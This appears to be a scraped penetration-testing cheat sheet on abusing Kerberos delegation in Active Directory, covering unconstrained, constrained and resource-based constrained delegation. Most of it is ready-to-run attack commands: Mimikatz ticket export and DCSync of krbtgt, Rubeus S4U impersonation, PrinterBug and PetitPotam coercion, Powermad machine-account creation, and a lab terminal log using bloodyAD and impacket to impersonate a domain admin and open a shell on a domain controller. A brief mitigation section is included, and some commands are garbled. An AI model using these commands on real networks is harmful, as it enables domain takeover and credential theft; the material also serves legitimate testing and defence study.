ADeleginator
NXC
Copy nxc ldap 192.168.56.11 -u eddard.stark -p FightP3aceAndHonor! --find-delegation https://x.com/al3x_n3ff/status/1857153795949559875?t=3iN0A-aTMN58zD0O7rIIlA&s=03
SharpADWS
Unconstrained Delegation
Unconstrained Delegation: allows the first hop server to request access to any service on any computer in the domain
Discovery
Copy Get-DomainComputer - UnConstrained
Copy Get-ADComputer - Filter {TrustedForDelegation -eq $True }
Get-ADUser - Filter {TrustedForDelegation -eq $True } Compromise the server where unconstrained delegation is enabled
Wait for a DA to connect then
Copy Invoke-Mimikatz - Command '"sekurlsa::tickets /export"' Reuse DA token
Copy Invoke-Mimikatz - Command '"kerberos::ptt C:\path\to\[****]-*****-Administrator@krbtgt-DOMAIN.LOCAL.kirbi"' Trick a high user to connect to a machine with Unconstrained Delegation ? Printer Bug
Printerbug also works across a Two-way forest trust with TGT Delegation enabled - See Trusts
Capture the TGT of dc$ by using Rubeus on victim server
Copy Rubeus.exe monitor / interval: 5 / nowrap Printerbug - Run MS-RPRN.exe
Copy MS-RPRN.exe \\dc.domain.local \\vicitm.domain.local
# Victim host
Rubeus.exe monitor / interval: 5 / nowrap Or with PetitPotam
Copy .\ PetitPotam.exe victim - hostname
# Victim host
Rubeus.exe monitor / interval: 5 / nowrap On Linux, use Coercer
ShadowCoerce or DFSCoerce can also be used
Copy the base64 encoded TGT and remove extra spaces before use it
Copy Rubeus.exe ptt / ticket: < Base6 4> Or use Invoke-Mimikatz:
Copy [ IO.File ]::WriteAllBytes( "C:\AD\Tools\USDC.kirbi" ,
[ Convert ]::FromBase64String( "ticket_from_Rubeus_monitor" ))
Invoke-Mimikatz - Command '"kerberos::ptt C:\path\to\ticket.kirbi"' Run DCSync
Copy Invoke-Mimikatz - Command '"lsadump::dcsync /user:domain\krbtgt"' Mitigation
The following security controls should be implemented to mitigate unconstrained delegation:
Ensure computer objects are not configured for unconstrained delegation. If delegation is required for a computer object, use resource-based constrained delegation instead.
Ensure privileged user objects are configured as ‘sensitive and cannot be delegated’. This can be configured by using the ‘Account is sensitive and cannot be delegated’ option on the user object in Active Directory Users and Computers.
Disable the Print Spooler service on Domain Controllers. This prevents the Print Spooler service from being used to coerce a Domain Controller into authenticating to another system.
https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/detecting-and-mitigating-active-directory-compromises?s=03
Constrained Delegation - Protocol Transition
Constrained Delegation: allows the first hop server to request access only to specified computers
Service for User (S4U) used to impersonate a user
S4U2self: allows a forwardable TGS to itself on behalf of a user - TUSTED_TO_AUTHENTICATE_FOR_DELEGATION
S4U2proxy: allows a service to obtain a TGS to a second service on behalf of the user - msDS-AllowedToDelegateTo contains a list of SPN to which the token can be forwarded
Discovery
Copy Get-DomainUser - TrustedToAuth
Get-DomainComputer - TrustedToAuth
Copy Get-ADObject - Filter {msDS - AllowedToDelegateTo -ne " $null " } - Properties msDS - AllowedToDelegateTo Abusing with kekeo
password or NTLM/AES keys required
Copy kekeo # tgt::ask /user:victim_user /domain:domain.local /rc4:<ntlm_hash>
Copy kekeo # tgs::s4u /tgt:<tgt_from_step_1>.kirbi /user:Administrator@domain.local /service:cifs/mssql.domain.LOCAL
Copy kekeo # tgs::s4u /tgt:<tgt_from_step_1>.kirbi /user:Administrator@domain.local /service:cifs/mssql.domain.LOCAL|HTTP/mssql.domain.LOCAL
Copy Invoke-Mimikatz - Command '"kerberos:ptt <tgs_from_step_2>.kirbi"'
Copy ls \\mssql.domain.local\c$
Copy Invoke-Command - ScriptBlock{whoami} - ComputerName mssql.domain.local Abusing with Rubeus
Request TGT and TGS in a single command
Copy Rubeus.exe s4u / user:victim_user / aes256: < aes_key > / impersonateuser:Administrator / msdsspn:CIFS / mssql.domain.LOCAL / ptt
Copy ls \\mssql.domain.local\c$ The delegation occurs not only for the specified service but for any service running under the same account. No validation for the SPN specified
With rc4
Copy Rubeus.exe s4u / user:appsvc / rc4: < ntlm_hash > / impersonateuser:administrator / msdsspn:CIFS / mssql.domain.local / altservice:HTTP / domain:domain.local / ptt
winrs - r:umssql - hostname cmd.exe Abusing with kekeo
password or NTLM/AES keys required
Copy kekeo # tgt::ask /user:victim_machine_account$ /domain:domain.local /rc4:<ntlm_hash>
Copy kekeo # tgs::s4u /tgt:<tgt_from_step_1>.kirbi /user:Administrator@domain.local /service:time/dc.domain.LOCAL|ldap/dc.domain.LOCAL
Copy Invoke-Mimikatz - Command '"kerberos:ptt <tgs_from_step_2>.kirbi"'
Copy Invoke-Mimikatz - Command '"lsadump::dcsync /user:domain\krbtgt"' Abusing with Rubeus
Request TGT and TGS in a single command
Copy Rubeus.exe s4u / user:victim_machine_account$ / aes256: < aes_key > / impersonateuser:Administrator / msdsspn:time / dc.domain.LOCAL / altservice:ldap / ptt
Copy SafetyKatz.exe "lsadump::dcsync /user:domain\krbtgt" "exit" Persistence - msDS-AllowedToDelegateTo
Resource-based Constrained Delegation
Instead of SPNs on msDS-AllowedToDelegatTo on the front end service, access is control by a security descriptor of msDS-AllowedToActOnBehalfOfOtherIdentity (visible as PrincipalsAllowedToDelegateToAccount) on the resource/service
The service administrator can configure this delegation whereas for other type SeEnableDelagation privs required - by default only DA
Two privileges needed to abuse RBCD:
Write permissions over the target service
Control over an object which as SPN configured (like admin access do a domain joined machine or ability to join a machine to domain - ms-DS- MachineAccountQuota is 10 by default)
Write Permission
Copy Find-InterestingDomainACL | ? { $_.identityreferencename -match 'username' } Exploit
Configure RBCD
Copy $comps = 'computer1$' , 'computer2$'
Set-ADComputer - Identity victim - PrincipalsAllowedToDelegateToAccount $comps Extract AES keys for computerx$
Copy Invoke-Mimikatz - Command '"sekurlsa::ekeys"' Use the AES key and access vicitm as ANY user we want
Copy Rubeus.exe s4u / user:computer1$ / aes256: < aes_key > / msdsspn:http / victim / impersonateuser:administrator / ptt
Copy winrs - r:victim cmd.exe With Impacket
L.BIANCHI_ADM is a DA
Copy ┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ ./bloodyAD.py --host dc01.domain.htb --dc-ip 10.10.11.45 -d "DOMAIN.HTB" -u user -p 'password' -k add groupMember "DELEGATEDADMINS" "SVC_LDAP"
[+] SVC_LDAP added to DELEGATEDADMINS
┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ ./bloodyAD.py --host dc01.domain.htb -d "DOMAIN.HTB" --dc-ip 10.10.11.45 -k set object "SVC_LDAP" servicePrincipalName -v "cifs/fake"
[+] SVC_LDAP's servicePrincipalName has been updated
┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ impacket-getTGT domain.htb/svc_ldap:password -dc-ip dc01.domain.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in svc_ldap.ccache
┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ export KRB5CCNAME=svc_ldap.ccache
┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ impacket-getST -spn 'cifs/dc01.domain.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.10.11.45 -k 'domain.htb/svc_ldap:password'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating L.BIANCHI_ADM
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in L.BIANCHI_ADM@cifs_dc01.domain.htb@DOMAIN.HTB.ccache
┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ export KRB5CCNAME=L.BIANCHI_ADM@cifs_dc01.domain.htb@DOMAIN.HTB.ccache
┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ impacket-wmiexec -k -no-pass DOMAIN.HTB/L.BIANCHI_ADM@dc01.domain.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type Users\Administrator\Desktop\root.txt Constrained Delegation - Kerberos Only
Leverage RBCD to abuse Kerberos Only configuration
Enumeration
Copy # AD Module
Get-ADObject - Filter {msDS - AllowedToDelegateTo -ne " $null " } - PropertiesmsDS - AllowedToDelegateTo Create a new machine account
https://github.com/Kevin-Robertson/Powermad
Copy Powermad.ps1 New-MachineAccount - MachineAccount studentcompX Configure RBCD
Copy # On victim host
Rubeus.exe asktgt / user:victim$ / aes256: < aes_key > / impersonateuser:administrator / domain:domain.local / ptt / nowrap
# With AD Module
Set-ADComputer - Identity victim$ - PrincipalsAllowedToDelegateToAccount studentcompX$ - Verbose Get TGS
Copy # Get hash
Rubeus.exe hash / password:P@ssword@123
Rubeus.exe s4u / impersonateuser:administrator / user:studentcompX$ / rc4: < rc4_hash > / msdsspn:cifs / victim.domain.local / nowrap Request a new forwardable TGS
Copy Rubeus.exe s4u / tgs: < base67_tgs_from_previous_step > / user:victim$ / aes256: < victim$_aes > / msdsspn:cifs / mssql.domain.local / altservice:http / nowrap / ptt
winrs - r:mssql.domain.local cmd.exe 
